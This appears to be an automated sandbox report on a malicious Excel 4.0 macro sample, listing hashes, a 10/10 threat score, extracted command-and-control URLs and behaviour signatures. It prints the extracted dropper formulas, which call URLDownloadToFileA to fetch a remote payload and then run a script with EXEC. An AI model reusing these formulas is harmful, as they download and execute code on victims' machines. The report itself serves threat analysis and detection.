General

  • Target

    efcb1c6af3fe55ca0a9e89c745715251

  • Size

    6KB

  • Sample

    231222-tygh2sfhbm

  • MD5

    efcb1c6af3fe55ca0a9e89c745715251

  • SHA1

    a6dc87522ae3acc43e124179192ccd035f9675fc

  • SHA256

    0e991ce3388d4f678241901e8c617fbc7c19a37d2e8ba480e4e81697713885eb

  • SHA512

    525b1a651159301c159758516552b7e439a7316426dfd46a757fb0927ad09b2344ab721d20354b0a09f3fc0e4b37049220e1c7e6eda244a7f8b891f221d81053

  • SSDEEP

    192:NDSkuSmbrA2OmmfRB8UhHFBFYuPb98yNQ+Vn7kJxu:NnuHM2wj1FY6b98yNLn7kJxu

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0)
    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0)
    =EXEC("wscript C:\zer\spp.vbs")
    =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

xlm40.dropper

http://google.com/index.php

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

Targets

    • Target

      efcb1c6af3fe55ca0a9e89c745715251

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

MITRE ATT&CK Enterprise v15